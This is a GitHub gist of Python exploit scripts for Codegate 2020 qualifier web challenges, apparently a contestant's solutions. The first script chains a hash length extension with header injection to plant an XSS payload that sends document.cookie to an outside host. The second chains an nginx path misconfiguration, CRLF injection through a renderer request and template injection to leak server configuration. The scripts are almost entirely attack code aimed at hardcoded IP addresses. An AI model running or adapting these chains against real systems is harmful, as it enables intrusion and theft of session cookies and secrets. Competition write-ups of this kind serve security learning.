Skip to content

Instantly share code, notes, and snippets.

@shpik-kr
Last active February 10, 2020 03:39
Show Gist options
  • Save shpik-kr/8b9669b5c1ae343194d1e8af24259099 to your computer and use it in GitHub Desktop.
Save shpik-kr/8b9669b5c1ae343194d1e8af24259099 to your computer and use it in GitHub Desktop.
Codegate 2020 Quals Web Exploit code
'''
1. hash length extension: Make multi query.
2. header injection: Remove CSP header, and XSS occur
'''
import hashpumpy
import requests
b64e = lambda x:x.encode('base64').replace('\n','')
h = '9324c43e76bdfb789eebe82870f2d1a8'
origin = 'aGVhZGVy,VmFyeQ==,Kg=='
payload = '<script\n>location.href="//mashiro.kr?"+document.cookie;</script\n>'
add = '|'
add += b64e('header')+','+b64e('HTTP/1.1')+','+b64e('100 Continue')+'|'
add += b64e('body')+','+b64e('HTTP/1.1 200 OK\r\nHost: 127.0.0.1\r\nContent-Type: text/html\r\nContent-Length: '+str(len(payload))+'\r\n\r\n'+payload+'\r\n')+','+b64e('')+'|'
key_legnth = 12
new_hash,msg = hashpumpy.hashpump(h, origin, add, 12)
encoded = (msg).encode('base64').replace('\n','')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "110.10.147.166"
port = 80
print 'http://%s/api.php?sig=%s&q=%s'%(host, new_hash, encoded)
s.connect((host, port))
data = '''GET /api.php?sig=%s&q=%s HTTP/1.1
Host: %s
'''%(new_hash, encoded, host)
s.send(data)
print `s.recv(1024)`
print `s.recv(1024)`
print `s.recv(1024)`
'''
1. Nginx Misconfig: http://[domain]/static../, Leak source code.
2. CRLF: Send header for bypassing some condition about header.
3. SSTI: Read Log file as `render_template_string`.
'''
import requests
def write_log(payload):
renderer = "http://110.10.147.169/renderer/"
adminpage = "http://127.0.0.1/renderer/admin?body="+payload+" HTTP/1.1\x0d\x0aHost: 127.0.0.2\x0d\x0aX-Forwarded-For: 127.0.0.2,{{config}}\r\nx:"
data = {
"url": adminpage
}
r = requests.post(renderer, data=data)
aa = r.text
a = aa.split('ticket no ')[1].split('\n')[0]
return a
def read_log(ticket):
renderer = "http://110.10.147.169/renderer/"
ticket_url = "http://127.0.0.1/renderer/admin/ticket?ticket="+ticket+" HTTP/1.1\x0d\x0aUser-Agent: AdminBrowser/1.337\r\nX-Forwarded-For: 127.0.0.1\r\nHost: 127.0.0.1\r\n\r\nX"
data = {
"url": ticket_url
}
r = requests.post(renderer, data=data)
print r.text
def file_check(ticket):
print requests.get('http://110.10.147.169/static../tickets/'+ticket).text
payload = "{{config}}"
ticket = write_log(payload)
print 'ticket no', ticket
file_check(ticket)
read_log(ticket)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment